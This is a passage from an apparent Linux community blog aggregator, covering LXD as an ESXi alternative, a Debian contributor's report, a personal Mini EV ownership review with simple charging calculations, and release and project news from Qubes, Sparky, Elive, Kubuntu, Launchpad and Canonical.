| VM live migration | Yes | Yes |
| Shared storage | Ceph | vSAN |
| Networking | Bridge, OVN | NSX |
| Snapshots | Yes | Yes |
| Backup | Yes | Yes |
| Free trial | N/A (unlimited free usage) | 30 days |
| Pricing | Free, with enterprise support available on a per physical host basis | Full functionality requires a paid licence, differing based on the number of cores |
Next, let’s take a closer look at LXD’s capabilities:
LXD is very easy to set up. Four simple steps are all it takes to get ready to run workloads:
1. On Ubuntu, just run
snap install lxd
2. Then run:
lxd init
This will prompt you to configure your LXD instance. Default options are sufficient in many cases, but make sure to select “yes” when asked whether LXD should be available over the network. This will allow you to access the Web UI.
3. Access the UI in your browser by entering your server address (for example, https://192.0.2.10:8443), and follow the authentication prompts.
4. Click on “create instance” to launch your first VM.
While you might be looking for an ESXi alternative, we also understand that users will wish to keep their existing workloads currently running on ESXi (or elsewhere). To import your existing VMs, LXD provides a tool (lxd-migrate) to create an LXD instance based on an existing disk or image. Using this tool, with some extra configuration, users can import their existing VMs. More details are available in this guide.
While LXD is primarily a Linux-based tool, it is also available for Windows users via WSL. WSL allows users to have the full Ubuntu experience on their Windows machines. Here is a practical example of how you can work with web services using WSL and LXD.
If you’re reading this blog, your primary interest is likely to be virtual machines. But system containers are a great alternative that could potentially cover many of your use cases.
System containers are in a way similar to a physical or a virtual machine. However, they utilise the kernel of the host to provide a full operating system, with the same behaviour and manageability as VMs but without the usual overhead, and with the density and efficiency of containers. For almost any use case, you could run the same workload in a system container and avoid the overhead that usually comes with virtual machines. The only exception would be if you needed a specific kernel version or kernel feature different from that of the host.
If you are curious about learning more, refer to this blog about Linux containers, or this one covering the differences between virtualization and containerization.
LXD has come a long way since its inception and nowadays covers much more than system containers. It is a modern, secure and robust alternative to ESXi and other traditional hypervisors. With its intuitive CLI and web interface, users can easily get started and deploy and manage their workloads intuitively. ESXi users, as well as others looking for a competent, open source virtualization option, should take LXD for a spin.
Learn more about LXD on the LXD webpage or in the documentation.
Learn more about LXD UI.
Curious about using LXD for development? Read about it in LXD for beginners.
Curious about some practical use cases? Read how you can use LXD to build your ERP.
05 March, 2024 06:09AM by aida
Welcome to Purism, a different type of technology company. We believe you should have technology that does not spy on you. We believe you should have complete control over your digital life. We advocate for personal privacy, cyber security, and individual freedoms. We sell hardware, develop software, and provide services according to these beliefs. To […]
The post Purism Differentiator Series, Part 6: Security appeared first on Purism.
04 March, 2024 08:16PM by Todd Weaver
Two months into my new gig and it’s going great! Tracking my time has taken a bit of getting used to, but having something that amounts to a queryable database of everything I’ve done has also allowed some helpful introspection.
Freexian sponsors up to 20% of my time on Debian tasks of my choice. In fact I’ve been spending the bulk of my time on debusine which is itself intended to accelerate work on Debian, but more details on that later. While I contribute to Freexian’s summaries now, I’ve also decided to start writing monthly posts about my free software activity as many others do, to get into some more detail.
man now restricts the system calls that groff can execute and the parts of the file system that it can access. I stand by this, but it did cause some problems that have needed a succession of small fixes over the years. This month I issued DLA-3731-1, backporting some of those fixes to buster.
[…] /etc/ssh/sshd_config. This turned out to be resolvable without any changes, but in the process of investigating I noticed that my dodgy arrangements to avoid ucf prompts in certain cases had bitrotted slightly, which meant that some people might be prompted unnecessarily. I fixed this and arranged for it not to happen again.
[…] time_t transition for now, but once that’s out of the way it should flow smoothly again.
04 March, 2024 06:55AM by aida
tl;dr I have had a Mini EV for a little over two years, so I thought it was time for a retrospective. This isn’t so much a review as I’m not a car journalist. It’s more just my thoughts of owning an electric car for a couple of years.
I briefly talked about the car in episode 24 of Linux Matters Podcast, if you prefer a shorter, less detailed review in audio format.
Patreon supporters of Linux Matters can get the show a day or so early, and without adverts. 🙏
In August 2020, amid [The Event], and my approaching 50th birthday, I figured it was about time for a mid-life crisis. So, after a glass of wine, late one evening, I filled in a test-drive request form for a Tesla electric car.
I was surprised to get a call from a Tesla representative the next day to organise the booking. A week later, I turned up at the nearest Tesla “dealership” in an industrial estate near Heathrow Airport to pick up the car.
I had maybe twenty minutes to drive the car alone, on a fixed route, and then bring it back. I’d never driven a fully electric car before that, nor even been in one as a passenger, that I recall. I’ve been in countless Toyota Priuses over the years, the go-to taxi for the discerning cabbie.
I had no intention of buying the car, so we parted ways after the drive. The salesman was phlegmatic about this. He said it didn’t matter because now I’ve driven one and had a positive experience, I’d be more likely to rent a Tesla or talk about the experience with friends.
Not yet done the former; definitely have done the latter.
A year later, my pangs for a new car continued. I also took a Citroen EC5 out for a spin and borrowed a Renault ZOE. Both were decent cars, but not really what I was after. The Citroen was too big, and the ZOE had an ugly, fat arse-end.
Then I took a look at the Mini. Initially, it wasn’t on my radar, but then I watched every video review and hands-on I could find. I was almost already sold on it when I took one out for a test drive. Indeed, after telling the amiable and chilled sales guy which cars I’d already test-driven, he said, “If you drive the Mini, you’ll buy it, not the others”.
“That is a bold claim!”, I thought.
He was right though. I bought one. Here it is some months later, at a “favourite” charging spot late one night.
I’ve had many cars over the years, some second-hand, a few hand-me-downs in the family, but never a new car for me, for my pleasure. I do enjoy driving, but less so commuting in traffic, which is handy now I’ve worked from home for over a decade.
Now the kids are grown up, and the wife has a slightly larger car if we all go somewhere. I can get away with a two-door car.
I went for the “2021 BMW Mini Cooper Level 3”, as it’s known officially. The design is from 2019 and has been replaced in 2024. Level 3 refers to the car’s trim level and is one of the highest. There were a few additional optional extras, which I didn’t choose to buy.
The one option I wish I’d got is adaptive cruise control, which is handy on UK motorways. Dial in a speed and let the car adjust dynamically as the car in front slows or speeds up. My wife’s car has it, and I am mildly kicking myself I didn’t get it for the Mini.
The full spec and trim can be seen in the BMW PDF. Here’s the page about my car’s specifications. Click to make it bigger.
I went for black paint and the “3-pin plug” inspired wheels. They’re quite quirky and look rather cool at low speed due to their asymmetry. Not that I see that view often, as I’m usually driving.
Here’s what it looks like when you’re speccing up the Mini online. This is a pretty accurate representation of the car.
The most important part of a car is how it drives. I love driving this thing. The Mini EV is tremendously fun to drive. It’s relatively quick off the mark, which makes it great for safe overtaking. Getting away from the lights is super fun too.
Being an EV, it’s got a heavy battery, so it doesn’t skip around much on the road. I’ve always felt in control of the car, as it drives very much like a go-kart: point-and-shoot.
Without a petrol engine, there’s certainly less noise and vibration while driving. Road and wind noise is audible, but it’s pleasantly quiet when pootling around town. As required by law, it makes some interesting “spacey” noises at low speed, so pedestrians can hear you coming. Although I’ve surprised a few people and animals when they couldn’t.
Unlike the four-door Mini Clubman, it’s got long rimless doors, which make for getting in and out a bit easier. They also look cool. I’ve always enjoyed the look of a two-door coupe or hatchback car with rimless front windows.
There are four driving modes, Normal (the default), Sport, Green and Green+. Green+ is the eco-warrior mode which turns all the fans off, and reduces energy consumption quite a bit, extending the overall range. Sport is at the other end of the scale, consuming more power, being more responsive, and lighting the car interior in red, which is cute.
There are two levels of regenerative braking, which is on by default. I never change this setting, but you can. It means I can drive with one pedal, letting the regenerative braking reduce speed as I approach junctions or traffic. I rarely use the brake pedal at all.
The brake lights do illuminate when regenerative braking is occurring, which I’m sure is annoying for the person behind me when I’m hovering between go and stop. The car doesn’t come to a complete stop if you remove your feet from the pedals, so I do have to use the brake pedal to completely stop the car, which is a shame.
London has a Congestion Charge (CC) and a (controversial) Ultra Low Emission Zone (ULEZ): cars have to pay to enter the centre of London, with some exceptions. As the Mini is electric, it currently doesn’t have to pay the CC. However, to qualify for exemption from the £15 daily charge, you have to pay a £10 annual charge.
I sometimes use “JustPark” to find interesting places to put the car while I’m in London. Here I found a spot in the grounds of an old church.
I have always loved driving in central London, and I’ve used this perk a fair few times to drive into the centre for work, to meet friends, or to go out in the evening. It’s cheaper for me to drive into central London and park than it is to buy a return train ticket, which is mad.
It’s a two-door car that can seat two adults comfortably in the front and two kids in the back. Or four adults uncomfortably as the legroom in the back is quite cramped. I never sit in the back, so I don’t care about that.
On the odd occasion the four of us (two adults and two teenage kids) have been in the car together, it’s been fine. I wouldn’t do a long journey like that, though.
The seats are comfortable, even for a relatively long drive, and being small, everything is very much within reach. I’m almost 6ft tall and fit just fine. However, with the seat far back, my view of traffic lights when in the front of a queue is somewhat limited. The mirror also obscures my view more than most cars, as it’s parallel to my eyes rather than “up and to the left” as it would be in a larger cabin.
There are two sunroofs, each with a manual sliding mesh shade on the underside. The front roof can be tilted or slid open using a switch in the overhead panel. The rear sunroof doesn’t open.
The interior is a mix of retro Mini styling and newfangled screens. It has a big central circle harking back to the original Mini speedo; here, though, it contains a rectangular display. There are physical controls for air conditioning, seat warmers, parking assistance, media, navigation, the lot. While the display is a touch screen, that’s rarely needed when using the built-in software.
It looks like this, but with the steering wheel on the right (correct) side.
I should mention that I don’t like the buttons on the steering wheel, nor those immediately under the display. They’re flat rocker-style ones, which you have to look at to find. The previous generation of Mini had raised round buttons, which are much easier for fingers to find.
The built-in navigation system is pretty trashy, like most cars. I’ve never found a car with a decent navigation system that can beat Android Auto or Apple Car Play. I also like using Waze, Apple Maps, and a podcast app while driving.
In this photo, you can see the navigation display, which highlights the expected current range with the circle around the car’s location. Also note the “mode” button, one of the flat ones I dislike. The lights around the display illuminate to show the temperature of the heating, or the volume of the audio system, while you adjust it.
One benefit of the onboard navigation system is that driving instructions and lane recommendations appear on the Head-Up Display (HUD) in front of the driver. The downside of mobile apps on the Mini is that they don’t have access to the HUD, so I have to glance across at the central display to see where I need to turn. Alternatively, I could turn up the volume on the mobile map app, but that would interrupt podcasts in an annoying way.
I drove a brand new BMW with a similar HUD that did integrate with the navigation system on my phone, so I suspect this is simply a missing feature of the BMW on-board software in my Mini, which may be fixed in a later release. Mine doesn’t have that software, though.
The back seats can be folded to provide more boot space, which is welcome in a car with so little luggage space. I’ve used the Mini for a ‘big shop’ with the seats folded down and can fit plenty of ‘bags for life’ full of groceries in there.
There are the usual media controls on one side of the steering wheel, with cruise and speed-limit controls on the other. Window, sunroof and other important controls all have buttons in the expected places. A minimalist-button Tesla, this is not.
There’s an induction phone charger inside the armrest. The best part about this is with Apple CarPlay, I can just hide the phone in there, charging, so I’m not distracted while driving. The worst part is I frequently forget the phone is in there, and leave it when walking away from the car.
The Mini is a BEV (battery EV) rather than a PHEV (plug-in hybrid EV) like a Prius or BMW i3 with range extender, so it has no petrol engine; the battery powers a single motor to propel the car.
The Mini is sold with only one battery option: a 30 kWh capacity with an estimated 140-mile range. There’s a CCS (Combined Charging System, Combo 2) socket under a flap on the rear right (driver’s) side, so it can do slower AC charging or faster DC charging.
The car comes with all the cables required for charging from a 13-amp socket at home or from a 7 kW domestic or public “slow” charger. Faster public chargers have their own integrated (tethered) cables.
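As a rough back-of-the-envelope comparison of those charging options (my own numbers, not BMW’s: I assume the full 30 kWh is usable, a ~230 V UK mains supply, and I ignore charging losses and the taper near 100%):

```python
# Rough charge-time estimate for a ~30 kWh battery (assumed usable capacity).
# Real-world times will be longer due to losses and the charge curve tapering.

BATTERY_KWH = 30.0

def hours_to_full(charger_kw: float, start_pct: float = 0.0) -> float:
    """Hours to charge from start_pct to 100% at a constant power."""
    needed_kwh = BATTERY_KWH * (1 - start_pct / 100)
    return needed_kwh / charger_kw

granny_kw = 13 * 230 / 1000   # 13 A UK socket at ~230 V is roughly 3 kW
print(f"13 A socket:  {hours_to_full(granny_kw):.1f} h")  # → 10.0 h
print(f"7 kW wallbox: {hours_to_full(7.0):.1f} h")        # → 4.3 h
print(f"50 kW DC:     {hours_to_full(50.0):.1f} h")       # → 0.6 h
```

Which is why the overnight 7 kW wallbox is the sweet spot: the car is always full by morning, and the fast DC chargers only matter on longer trips.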
A few days before the car arrived, I had a charger installed at home on the outside wall of the house. I’m fortunate to have a driveway at the front of the house. So I typically park the car on it and plug in when I get out.
Sometimes I forget, or don’t bother if I know the battery still has plenty of charge and I have no upcoming long journeys. But more often than not, I try to plug it in, even if it won’t actually charge until the next day.
In my personal experience, most charges are done at home. I have charged in many places away from home, but that’s not very common for me. The last time I checked the stats, it had been around 86% charging at home and 14% on public chargers.
I often take a photo of the car while it’s charging in a public place. Usually to share on social media to spark a conversation about charging infrastructure. On this occasion I was using a charger in the car park at Chepstow Castle.
I know petrol heads often bleat about the very idea of waiting while the car fills up, but sometimes it leads to nice places, like this. This was a pretty slow charger, but I didn’t really care, as I had a castle to walk around!
Sometimes the locations are less pretty. This is Chippenham Pit-Stop, which does a great breakfast while you wait for your car to charge.
My home charger is made by Ohme. It has a display and a few weatherproof buttons to be directly operated without needing an app. However, a few additional features are only available if the app is installed.
The Ohme app can access my energy provider via an API, which lets the charger know the optimal time, from a pricing perspective, to start charging the car. That seems to work well with Octopus Energy, my domestic provider.
It’s possible to define multiple charging schedules to ensure the car is ready for departure at the time you’re leaving.
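The logic behind this kind of price-optimised scheduling can be sketched quite simply: given a list of half-hourly unit prices (the numbers below are invented, not real tariff data, and a real integration would fetch them from the supplier’s API), pick the cheapest contiguous window long enough to deliver the required charge before departure.

```python
# Toy sketch of price-optimised charging: choose the cheapest contiguous
# run of half-hour slots that covers the required charging time.
# Prices here are made up for illustration.

def cheapest_window(prices: list[float], slots_needed: int) -> int:
    """Return the start index of the cheapest contiguous window."""
    best_start, best_cost = 0, float("inf")
    for start in range(len(prices) - slots_needed + 1):
        cost = sum(prices[start:start + slots_needed])
        if cost < best_cost:
            best_start, best_cost = start, cost
    return best_start

# Half-hourly p/kWh prices from 22:00 onwards (invented):
prices = [28.0, 25.0, 18.0, 9.0, 7.5, 8.0, 12.0, 24.0]
start = cheapest_window(prices, slots_needed=3)  # need 1.5 h of charging
print(start)  # → 3, i.e. the 9.0 + 7.5 + 8.0 run from 23:30 to 01:00
```

A departure-time schedule is then just a constraint on how late that window is allowed to end.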
The Ohme app is also supposed to be able to talk to the BMW API with my credentials, in order to talk to the car. This has never worked for me. I have had calls and emails with Ohme about this, but I gave up in frustration. It just doesn’t work.
That doesn’t stop the car from actually charging though. Indeed, according to the stats in the app (which I only discovered while writing this blog) - I’ve charged for over 720 hours at home in the last twelve months. The dip in November & December is explained below under “Crash repair”.
There are a few issues I’ve had with the car.
The car has its own mobile connectivity, and talks to BMW periodically. But for that to work, you have to successfully pair the car with your phone app. The pairing process between the mobile app and the car itself should just be a case of entering the Vehicle Identification Number in the app. Sadly this didn’t work. I don’t know what was wrong, but it took around two weeks for it to be fixed.
The onboard navigation system had my address wrong. The house number it showed for my home doesn’t exist, and mine wasn’t in the database. The house has been here and numbered correctly for over 50 years. It was only a minor thing because I happened to know where I lived, and how to get there. It just irritated me that my own car, on my driveway, thought it was somewhere else.
I called Mini customer services and they didn’t seem to think it was easily fixable, and I should just hope for a map update.
So I did the nerd thing, and found out who the map supplier was - “Nokia Here” - and submitted a request to fix the data there. Later, I got a map update from BMW which contained my fix. That’s one way to do it.
Within a year of owning the car, it stopped charging at home. The AC charging port just wouldn’t work. I could charge at the fast public DC chargers nearby, but my home charger stopped working.
When I reported the problem to BMW, their assumption was that the wall box on my house was broken. We disproved this by showing a different car charging from the home wall box, and my car refusing to charge from public AC chargers.
The BMW dealership were still very reluctant to accept that there was a problem with the car. I had to drive it to the dealership and put the car on their own slow charger to show them it failing to charge. Only once I’d done that did they allow me to book it in for repair the next day.
In a bit of a dick move, I drove around to empty the battery completely, rocking up to the dealership with the car angrily telling me it had 0% charge. That way they’d have to fix the fault just to charge it enough to get it back to me. They did indeed fix the problem with the charging system, which took quite a while.
I got a rather fancy BMW i7 on loan while they repaired the car.
When I went to pick the car up, they were very apologetic that it took so long and gave me a bag of Mini merch as a gift. When I went to open the boot to put the bag away, I noticed that there was a panel unclipped and some disconnected wires dangling around in the boot. I had to call someone from the garage over to fix it before I could drive away.
I was a little sad that the car clearly hadn’t been fully checked over before I was given it back.
During cold weather in Winter, the charger plug sometimes gets stuck - frozen - into the socket. This can be quite frustrating as it’s impossible to set off to work while the cable is still attached to the house! I found some plumber grease which I smeared around the plug in the hope of lubricating and reducing the ingress or condensation of water. So far, that’s helped.
I took a wrong turn down a long A-road one night, which meant I didn’t have sufficient charge to get home without stopping to top up. I thought I’d try the internal navigation system, which has a database of charging stations.
The first location it took me to was a hotel. I drove around the car park and couldn’t find a charger at all; to be fair, that may have been down to the hotel’s signage rather than the navigation system. I gave up and chose the next nearest charger on the map. It confidently took me down some narrow lanes and stopped at a closed gate, the entrance to a farm. It looked to me like a private residence.
I gave up and switched to an app on my phone, and ended up at a nearby Tesla charging station where there were many free spaces, and I was able to charge with ease. It probably should have offered me that one first!
As I mentioned above, there is a Mini app for Android and iOS for managing the car. In it you can do some simple things like lock and unlock the car, turn the lights on, and enable the climate control before setting off. It also has a record of charging sessions, a map for finding chargers, and other useful information like locating the car, and showing battery charge level and estimated range.
It nags you constantly to say how great or bad the app is and, inexplicably on a scale of 0 to 10, whether you’d recommend it to friends or colleagues. I cannot fathom the kind of person who recommends apps to friends who don’t even own the car the app is for. It’s completely mental.
Every time the dialog comes up - and it’s come up a lot - I rate the app zero, and leave an increasingly irritated message to the developers to stop asking me. I have also filed a ticket with BMW. Their engineers came back to me with details of exactly how often it asks, based on how often you open the app, and the interval between one opening and the next.
You can’t turn this off. It’s super irritating, and I still get asked two years later. I still give it a zero, despite the app having some useful features.
The charge port is covered by a hinged flap, just like the fuel flap on a petrol car. The Mini recently started nagging me that the flap was open when it wasn’t. No amount of opening and closing would stop the nagging. Thankfully it still let me drive, with a little warning triangle on screen. I let the dealership know, and they fixed it at the next scheduled service.
In November my wife was involved in a crash when someone pulled out in front of her from behind traffic. She was only slightly injured, and the car was structurally fine, but a bit smashed up at the front. The other driver was at fault, and it was all sorted out via insurance. The local BMW-approved repair centre had the car from November to January while I had a hire car on loan. The car came back as good as new.
It’s a small car, so there’s no room for a spare wheel. I had a puncture recently and managed to limp the car back home. I pressed the SOS button in the car and got put through to a friendly agent.
They organised a BMW engineer to come out and change the wheel. He arrived very quickly, jumped out of his van and took the wheel off my car, replacing it with a spare he had in the van.
He then put my wheel in the boot of my car and asked me to text him once I’d got mine fixed, so he could pick up his spare. I got it fixed within a day or so and, as I was out at work, left his spare somewhere safe. He happily came and collected it. I was pretty pleased with this whole experience.
As I got closer to the two-year anniversary of ownership, the app started to remind me to book the car for a service. There’s a feature in the app to just press a button, and get taken to a page where you can book the car in. The links are all broken and always have been. I don’t have the energy to call BMW to tell them it’s all broken. They should do better QA on the app.
Eventually I just called the garage to get the car maintained. There was a scheduled two-year inspection, a low priority recall, brake check and my broken ‘fuel flap’ to fix. They had the car all day and everything was complete when I picked it up at the end of the day.
The fact that an EV needs no oil changes, oil filter replacements, spark plugs, timing chains/belts, or many of the other parts that wear out on a petrol car is quite attractive. But there’s still a regular service which needs doing.
Some argue that because the car has a one-pedal driving mode, where regenerative braking slows the car down, drivers are less likely to wear out the brakes. However, I’ve also seen it asserted that some cars actually use both regenerative braking and the physical disc brakes without telling the driver. I have no idea whether the Mini “smartly” applies the brakes, or only does so when I press the brake pedal.
I love the Mini EV. I love driving it, and often make excuses to drive somewhere, or I’ll go the ‘long way round’ in order to spend more time in it. It’s not perfect, but it’s super fun to drive.
As for it being my first EV. While the network of public EV chargers isn’t amazing, there’s enough where I live and travel to service my requirements. I don’t think I’ll go back to a petrol car anytime soon.
We’re also considering replacing my wife’s car soon, and will look at electric options for that too.
There’s a new refreshed Mini model out, that the local dealership salespeople seem to want me to test drive. Having seen it on video, but not in person, I’m not convinced I’ll like it. We’ll see.
Last year, we announced that the NovaCustom NV41 Series became a Qubes-certified computer for Qubes OS 4. We noted in the announcement that the NV41 Series came with Dasharo coreboot open-source firmware.
We are now pleased to announce that the NV41 Series is also available with Heads firmware. When you configure your NV41 Series, you can now choose either Dasharo coreboot+EDK-II (default) or Dasharo coreboot+Heads for the firmware. Both options are certified for Qubes OS 4. This makes the NV41 Series the first modern Qubes-certified computer available with Heads!
Current NV41 Series owners who wish to change from Dasharo coreboot+EDK-II to the Heads firmware version can buy the Dasharo Entry Subscription for an easy transition to Heads.
The 2nd monthly Sparky project and donate report of the 2024:
– Linux kernel updated up to 6.7.6, 6.6.18-LTS, 6.1.79-LTS & 5.15.149-LTS
– waterfox-classic-kpe & waterfox-g-kpe have been replaced by waterfox-kde package
– added to repos: mercury-browser, thorium-browser, noi, imaginer
– linux-image-sparky-amd64 meta package replaced linux-image-sparky7-amd64 meta package on Sparky 7 only
– updated sparky-tray so it calls APTus AppCenter instead of old APTus now
– fixed Yad killing in sparky-usb-imager, sparky-welcome & sparky-aptus-appcenter – they no longer kill all running Yad apps, only their own windows
– Sparky 2024.02 & 2024.02 Special Editions of the rolling line released
sparkybackup changes:
– added memtest86+ to live efi boot menu
– added uEFI firmware setup to live efi grub menu
– updated memtest86+ to version 7.0 for live bios mode too
– added Sparky version to the live grub main menu
There is a new channel to send donations via Revolut.
Many thanks to all of you for supporting our open-source projects. Your donations help keep them and us alive.
Don’t forget to send a small tip in March too, please.
| Supporter | Amount |
| --- | --- |
| Antoine B. | € 15 |
| Keith K. | $ 10 |
| Galen T. | $ 1.50 |
| Kaveh | $ 11.06 |
| Olaf T. | € 10 |
| Grzegorz P. | PLN 20 |
| Krzysztof S. | PLN 100 |
| Rafał Z. | PLN 50 |
| Michał C. | PLN 16.78 |
| Mariusz S. | PLN 169.68 |
| Andrzej P. | PLN 20 |
| Paweł S. | PLN 108.21 |
| Siegmund T. | € 20 |
| Karl A. | € 1.66 |
| Rudolf L. | € 10 |
| Marek B. | PLN 10 |
| Piotr M. | PLN 300 |
| Alexander F. | € 20 |
| Matt M. | € 8.25 |
| Stanisław G. | PLN 50 |
| Maciej S. | PLN 50 |
| Detlef O. | € 4 |
| Wacław T. | PLN 50 |
| Guillermo C. | PLN 333.45 |
| Ryan S. | PLN 95.63 |
| Jorge C. | $ 1.50 |
| Zsolt P. | PLN 114.03 |
| Jorg S. | € 5 |
| Mateusz G. | PLN 25 |
| Daniel K. | PLN 100 |
| Kamil P. | PLN 200 |
| Jürgen H. | € 20 |
| Wilfreid N. | € 10 |
| Tom D. | € 30 |
| JC A. | € 40 |
| Fujita K. | PLN 26 |
| Mateusz W. | PLN 50 |
| Bartosz S. | PLN 50 |
| Wojciech H. | PLN 1 |
| Total: | 67% |
| In glance: | € 193.91, PLN 1939.78, $ 24.06, mBTC 0 |
* Keep in mind that some amounts coming to us will be reduced by commissions for online payment services. Only donations sent directly in PLN to our Polish bank account will be credited in full.
01 March, 2024 08:48PM by wlad
The Elive Team is pleased to announce the release of 3.8.40 Beta. This new version includes:
– Big upgrade: now using the Debian Bookworm base with backports; this version has already been beta tested and improved for 3 months.
– MacBooks: much improved support, featuring a very elegant boot selector.
– RAM: improved performance and resource usage, especially in Live mode.
– Crontab integration on the desktop, which allows your system to enjoy features like automatic updates or hardware watchdogs without needing to re-login to your desktop.
– BTRFS: the filesystem has become more mature and usable.
Check more in the Elive Linux website.
01 March, 2024 05:07PM by Thanatermesis
First, I would like to give a big congratulations to KDE for a superb KDE 6 mega-release! While we couldn’t go with 6 on our upcoming LTS release, I do recommend KDE neon if you want to give it a try! I want to say it again: I firmly stand by the Kubuntu Council in the decision to stay with the rock-solid Plasma 5 for the 24.04 LTS release. The timing was just too close to feature freeze, and the last time we went with the shiny new stuff on an LTS release, it was a nightmare (KDE 4, anyone?). So without further ado, my weekly wrap-up.
Kubuntu:
Continuing efforts from last week (Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads), it has been another wild and crazy week getting everything in before feature freeze yesterday. We will still be uploading the upcoming Plasma 5.27.11, as it is a bug-fix release, and right now it is all about finding and fixing bugs! Aside from many uploads, my accomplishments this week are:
What comes next? Testing, testing, testing! Bug fixes and, of course, our re-branding. My focus is on bug triage right now. I am also working on new projects in Launchpad to track our bugs more easily, as right now they are all over the place and hard to track down.
Snaps:
I have started the MRs to fix our latest 23.08.5 snaps; I hope to get these finished in the next week or so. I have also been speaking to a prospective student with some GSoC ideas that I really like and will mentor; hopefully we are not too late.
Happy with my work? My continued employment depends on you! Please consider a donation http://kubuntu.org/donate
Thank you!
Launchpad has been around for a while, and its frontpage has remained untouched for a few years now.
If you go into launchpad.net, you’ll notice it looks quite different from what it has looked like for the past 10 years – it has been updated! The goal was to modernize it while trying to keep it looking like Launchpad. The contents have remained the same with only a few text additions, but there were a lot of styling changes.
The most relevant change is that the frontpage now uses Vanilla components (https://vanillaframework.io/docs). This alone not only made the layout look more modern, but also made it better for a curious new user reaching the page from a mobile device. The accessibility score of the page – calculated with Google’s Lighthouse extension – increased from 75 to an almost perfect 98!
Given the frontpage is so often the first impression users get when they want to check out Launchpad, we started there. But in the future, we envision the rest of Launchpad looking more modern and having a more intuitive UX.
As a final note, thank you to Peter Makowski for always giving a helping hand with frontend changes in Launchpad.
If you have any feedback for us, don’t forget to reach out in any of our channels. For feature requests you can reach us at feedback@launchpad.net or open a report in https://bugs.launchpad.net/launchpad.
To conclude this post, here is what Launchpad looked like in 2006, yesterday and today.
01 March, 2024 07:19AM by aida
As a key technology partner with NVIDIA, Canonical is proud to showcase our joint solutions at NVIDIA GTC again. Join us in person at NVIDIA GTC on March 18-21, 2024 to explore what’s next in AI and accelerated computing. We will be at booth 1601 in the MLOps & LLMOps Pavilion, demonstrating how open source AI solutions can take your models to production, from edge to cloud.
As the world becomes more connected, there is a growing need to extend data processing beyond the data centre to edge devices in the field. As we all know, cloud computing provides numerous resources for AI adoption, processing, storage, and analysis, but it cannot support every use case. Deploying models to edge devices can expand the scope of AI devices by enabling you to process some of the data locally and achieve real-time insights without relying exclusively on the centralised data centre or cloud. This is especially relevant when AI applications would be impractical or impossible to deploy in a centralised cloud or enterprise data centre due to issues related to latency, bandwidth and privacy.
Therefore, a solution that enables scalability, reproducibility, and portability is the ideal choice for a production-grade project. Canonical delivers a comprehensive AI stack with the open source software which your organisation might need for your AI projects from cloud to edge, giving you:
To put our AI stack to the test, during NVIDIA GTC 2024, we will present how our Kubernetes-based AI infrastructure solutions can help create a blueprint for smart cities, leveraging best-in-class NVIDIA hardware capabilities. We will cover both training in the cloud and data centres, and showcase the solution deployed at the edge on Jetson Orin based devices. Please check out the details below and meet our expert on-site.
Abstract:
Artificial intelligence is no longer confined to data centres; it has expanded to operate at the edge. Some models require low latency, necessitating execution close to end-users. This is where edge computing, optimised for AI, becomes essential. In the most popular use cases for modern smart cities, many envision city-wide assistants deployed as “point-of-contact” devices that are available on bus stops, subways, etc. They interact with backend infrastructure to take care of changing conditions while users travel around the city. That creates a need to process local data gathered from infrastructure like internet-of-things gateways, smart cameras, or buses. Thanks to NVIDIA Jetson modules, these data can be processed locally for fast, low-latency AI-driven insights. Then, as device-local computational capabilities are limited, data processing should be offloaded to the edge or backend infrastructure. With the power of Tegra SoC, data can first be aggregated at the edge devices to be later sent to the cloud for further processing. Open-source deployment mechanisms enable such complex setups through automated management, Day 2 operations, and security. Canonical, working alongside NVIDIA, has developed an open-source software infrastructure that simplifies the deployment of multiple Kubernetes clusters at the edge with access to GPU. We’ll go over those mechanisms, and how they orchestrate the deployment of Kubernetes-based AI/machine learning infrastructure across the smart cities blueprint to profit from NVIDIA hardware capabilities, both on devices and cloud instances.
Presenter: Gustavo Sanchez, AI Solutions Architect, Canonical
Starting a deep learning pilot within an enterprise has its set of challenges, but scaling projects to production-grade deployments brings a host of additional difficulties. These chiefly relate to the increased hardware, software, and operational requirements that come with larger and more complex initiatives.
Canonical and NVIDIA offer an integrated end-to-end solution – from a hardware optimised Ubuntu to application orchestration and MLOps. We enable organisations to develop, optimise and scale ML workloads.
Canonical will showcase 3 demos to walk you through our joint solutions with NVIDIA on AI/ML:
Visit our Canonical booth 1601 at GTC to check them out.
If you are interested in building or scaling your AI projects with open source solutions, we are here to help you. Visit ubuntu.com/nvidia to explore our joint data centre offerings.
29 February, 2024 10:53AM by martin
In December 2023, Canonical joined the Sylva project of Linux Foundation Europe to provide fully open-source and upstream telco platform solutions to the project. Sylva aims to tackle the fragmentation in telco cloud technologies and the vendor lock-in caused by proprietary platform solutions, by defining a common validation software framework for telco core and edge clouds. This framework captures the latest set of technical requirements from operators when running telco software workloads as cloud native functions (CNF), such as 5G core microservices and Open RAN software.
Sylva’s mission is to support 5G actors in their efforts to drive convergence of cloud technologies in the telco industry – taking into account interoperability across 5G components, TCO with open source software, compliance with regulations and adherence to high security standards. CNFs from vendor companies can then be operated and validated on reference implementations of the cloud software framework defined by Sylva.
To test and validate telco vendor CNFs, Sylva has deployed cloud-native platforms based on a multi-deployment model as Kubernetes (K8s) clusters on bare metal or OpenStack. These CNFs often require telco-grade enhanced platform features like SR-IOV, DPDK, NUMA, and Hugepages, along with support for a range of container networking interfaces (CNI). In this blog, we explain how Canonical’s Sylva-compliant infrastructure solutions satisfy these requirements.
Canonical’s product portfolio is closely aligned with Sylva’s objectives and strategies. It provides a variety of features that Sylva aims to include in the latest modern telecom infrastructure deployments. The project has already deployed validation platforms running on Ubuntu, and also leverages hardened Ubuntu 22.04 images.
Canonical Kubernetes is a CNCF conformant enterprise-grade Kubernetes with high-availability. It delivers the latest pure upstream Kubernetes, which has been fully tested across a variety of cloud platforms of all form factors, including provisioned bare metal systems, Equinix Metal and OpenStack, and architectures including x86, ARM, IBM POWER and IBM Z. It supports the Cluster API (CAPI), which is mandated by Sylva to provision Kubernetes. With CAPI, an operator can update Kubernetes clusters through rolling upgrades without disruption and initialise their workloads.
For telco edge clouds, Canonical Kubernetes can scale as a lightweight Kubernetes solution with self-healing, high-availability and easy clustering properties. This provides a minimal footprint for more energy-efficient operations at edge clouds. It can equivalently scale up at regional and central clouds where a larger footprint is needed in a data centre.
Based on Canonical Kubernetes, Canonical’s Cloud Native Execution Platform (CNEP) aligns with the Sylva platform features and architectural design. With CNEP, Kubernetes clusters are offered to telco operators on bare metal hardware, where hardware provisioning and cluster operations can both be controlled and orchestrated via Cluster API centrally.
